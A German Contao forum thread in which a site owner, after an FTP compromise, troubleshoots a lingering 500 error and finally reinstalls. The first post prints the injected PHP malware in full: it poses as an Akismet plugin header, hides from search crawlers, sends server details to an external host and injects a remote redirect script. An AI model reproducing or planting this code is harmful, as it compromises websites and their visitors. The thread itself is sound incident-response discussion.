FTP-account gehackt - Probleme beim Bereinigen

[sadara]

Hallo Community,

leider ist offenbar mein FTP-account gehackt worden (WS FTP bzw. Filezilla).
Praktisch alle Seiten sind nun infiziert mit einem Code, der versucht, die Seiten auf eine andere weiterzuleiten. Das funktioniert zwar nicht, aber beheben muss ich es ja trotzdem.
Hab natürlich zunächst die FTP-Programme runtergeschmissen, das ganze System mehrfach mit mehreren Scannern gescannt und arbeite trotzdem sicherheitshalber im Moment mit einem anderen Rechner und anderem FTP-Zugang (WINSCP). Alle Zugänge sind geändert.

Bei der ersten Installation war es alles recht einfach.
Nun sitz ich schon seit Stunden bei der zweiten.

Das ist noch eine Contao 2.9.5 - Installation (ja, ich weiss, aber die Seite ist schon seit über einem Jahr inaktiv (keine neuen Einträge) und es ist noch nicht klar, wann sie wieder aktiv wird, deshalb hab ich das update noch aufgeschoben.

Der Contao-Check zeigte mehrere korrupte Dateien. Das und noch ein paar Berechtigungsfehler.
Ich habe die korrupten Dateien (über einen anderen Rechner und WINSCP) durch die originalen ersetzt und die Berechtigungsfehler behoben.
Der Check zeigt nun keine Probleme mehr an, aber: wenn ich die Seite aufrufe, bekomme ich einen 500-Internal-Server-Error.
Das ist ja meistens irgendwas mit einer Berechtigung - aber wo???
Das Backend funktioniert normal.

Hier ist die URL: http://www.blickpunkt-caritas.de

Hat irgendwer, bitte, einen Tipp??? <Haare-rauf!!!!>



Der Code, der diversen Seiten (index.php, contao/index.php, contao/main.php, contao/page.php, typolight/index.php, typolight/main.php und tl_files/tiny templates/index.html) hinzugefügt wurde, ist folgender:

PHP-Code:

<?php
#8c42a3#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $o ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $o['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $o['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $o['PHP_SELF'] = $_SERVER['PHP_SELF'];
        $o['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $o['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $o['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $o['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
        $o['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];

        $o = __url_get_contents(
            "http://heleenbaars.nl/wp-content/themes/twentythirteen/n2hrjhv8.php" . "?fid=3310&info=" . http_build_query( $o ) . "&no=1&allow=1",
            2
        );

        $o = trim( $o );
        if( $o !== 'false' ) {
            echo "<script type=\"text/javascript\" src=\"http://heleenbaars.nl/wp-content/themes/twentythirteen/n2hrjhv8.php?id=81925\"></script>";
        }
    }
}
#/8c42a3#
?>

[KlausGrenoble]

Kopiere doch mal das check-Verzeichnis aus der zip-Datei in Dein Projektordner.
https://contao.org/de/manual/3.3/ins...-konfigurieren
Anschliessend http://www.blickpunkt-caritas.de/check/ und "Validate an..."

[sadara]

HAllo Klaus,

ich bin mal deinem Ratschlag gefolgt und hab den check-Ordner hochgeladen. Er findet eine bestehende Installation. Aber da ist nur der Hinweis, die Installation wäre nicht up to date (bezieht sich das jetzt auf die alte Version?) und ein fehlendes Bild aus dem Music-Academy-template, das ich aber sowieso nicht brauche.
Auf dem Server ist auch die alte contao-check 2.9.5 (aufzurufen unter: http://www.blickpunkt-caritas.de/contao-check.php), die aber auch nichts findet. Was zum Teufel kann das denn nur sein?
Habe inzwischen eine dritte Installation bereinigt, lief ohne Probleme....

Danke für deinen Tipp, fällt DIR vielleicht noch was ein?

Herzliche Grüsse,
Sadara

[KlausGrenoble]

Frage stellt sich:
Warum kann man
http://www.blickpunkt-caritas.de/typolight/install.php
nicht aufrufen wie bei meiner 2.6.7-Version:
http://contao.klausgraf.fr/v267/typolight/install.php
Fehlt die install.php (was ja nicht sein könnte, da der check ok ist) ?

[planepix]

Klaus,

die 2.9.5 ist doch schon Contao
http://www.blickpunkt-caritas.de/contao/

[sadara]

Hallo Klaus,

warum das Installtool über /typolight/install.php nicht funktioniert, weiss ich nicht (ich bekomme einen 500-Internal-Server-Error).
Es funktioniert aber beim Aufruf über: http://www.blickpunkt-caritas.de/contao/install.php

Wenn du möchtest, kann ich dir auch über PM einen Zugang schicken - das Backend funktioniert ja....

Danke und Grüsse,
Sadara

[planepix]

Könnte das noch an der RewriteBase liegen?

Werde die URLs umgeschrieben?

[tab]

Kannst ja mal versuchen, die Dateien der installierten Erweiterungen zu ersetzen oder, was auch immer wieder vorkommt, die .htaccess Datei überprüfen. Denn alle diese Dateien werden vom Check nicht geprüft, können also entweder verändert sein oder auch falsch abgespeichert. Kodierung sollte UTF-8 ohne BOM sein (falls das in der alten Version auch schon so war )

[sadara]

Hallo,

also, die URLs werden nicht umgeschrieben. Und die Erweiterungen? Was meinst du, sie über die Erweiterungsverwaltung zu aktualisieren?
Da hab ich im Zweifelsfall auf dem lokalen account nur ältere Versionen, weil ich die Erweiterungen nur auf dem Server aktualisiert habe, wenn überhaupt...
Aber ich prüfe das alles nach, danke!!

Früher gabs doch mal im Contao-Handbuch so eine Tabelle, welche Berechtigungen welche Ordner und Dateien brauchen. Die neueren Versionen brauchen das ja nicht mehr. Aber hat vielleicht irgendwer noch diese Tabelle aus dem alten 2.9er Handbuch?

Sadara

[KlausGrenoble]

Es funktioniert aber beim Aufruf über: .../contao/...

Logisch, hab' mich geirrt.
Und was passiert, wenn Du install aufrufst und das Passwort eingibst ?

[KlausGrenoble]

Im install-Tool sieht man unter Host "localhost".
Kann ja eigentlich nicht stimmen oder irre ich mich (was eigentlich noch nie vorgekommen ist) ?

[sadara]

Hallo Klaus,

ich habs jetzt extra nochmal nachgesehen, zumindest bei drei verschiedenen Installationen: da steht immer "localhost" drin. Und die funktionieren ja.....
Beispiel: www.caritas-sternkindergarten.de (das Installationspasswort ist das Gleiche)...

Sadara

[KlausGrenoble]

Beispiel

Da fehlt die install.php

[KlausGrenoble]

die .htaccess Datei überprüfen.

@Sadara: Vergleich' mal die .htaccess Datei mit der einer funktionierenden Installation !

[sadara]

Sorry, Klaus,

hab ich vergessen. Hatte mal gelesen, dass man die install.php umbenennen soll, aus Sicherheitsgründen, was ich dann (meistens) auch mache:
sirius_install.php

Welche .htaccess meinst du denn?
Im root hab ich gar keine, nur die default.htaccess aus der contao Installation, aber die wird ja nicht gezogen...

Sadara

[KlausGrenoble]

Schau doch mal in den Einstellungen, ob da Erweiterungen desaktiviert sind.
Vielleicht will install deswegen drop machen

[sadara]

Hallo Klaus,

die Mühe mit der Fehlermeldung kannst du dir sparen. Hab in der localconfig.php noch einen Eintrag gefunden: FTP: "true" - den hab ich auf "false" gesetzt.
Habe dann die entsprechende Erweiterung "botdetection" aktualisiert, genauso wie alle anderen Erweiterungen.
Hab auch das error-log-file bereinigt, um zu sehen, ob neue Einträge kommen - nichts.
Das Installtool läuft problemlos durch, der Contao-Check sagt: alles okay.
Habe trotzdem manuell nochmal sämtliche Dateien auf merkwürdige Aktualisierungen überprüft, aber nichts gefunden.
Keine Einträge im System-Log.

Trotzdem hab ich immer noch den "500 Internal Server Error".
Jetzt ist die Nacht praktisch vorbei, und mir fällt einfach nichts mehr ein.
Hab -nebenbei, haha- noch so ca. 10 andere Contao-Installationen bereinigt - kein Problem.
Nur diese will einfach nicht funktionieren.

Aber, verdammt noch mal, an IRGENDWAS MUSS es doch liegen???

Verzweifelte Grüsse,
Sadara

[css-umsetzung]

Du kannst mir gerne deine daten sendenwenn du möchtest,
dann bringe ich dir das in Ordnung, bzw schaue wo das Problem ist.

Ich brauche dann den ftp zugang

[magicsepp]

Was sagt den der Server error Log?

[sadara]

Hallo magicsepp,

an das Server-Log hab ich auch schon gedacht. Hab an den Provider geschrieben (ans Telefon geht keiner), aber bisher noch keine Antwort.....

Sadara

[sadara]

Hallo Community,

Konnte nicht herausfinden, woran der Fehler lag, aber nachdem ich von meinem Provider NICHTS gehört hatte - keine Reaktion (das letzte Mal, als ich sowas hatte, war die Firma ein paar Tage später pleite), habe ich alles runtergeschmissen, zunächst lokal alles neu installiert - lief. Dann hab ich vom Server ebenfalls alles gelöscht, ein neues Contao 2.95 installiert, die gesicherten Daten und die Sql-Datei hochgeladen. Hat Stunden gedauert, aber: jetzt läuft die Seite wieder.
Nochmals vielen Dank für eure Hilfe!

Übrigens dieser Trojaner, der die ganzen Seiten infiziert hat, heißt: "Troj/JSRedir-NY". Falls jemand ein ähnliches Problem hat..

Herzliche Grüsse,
Sadara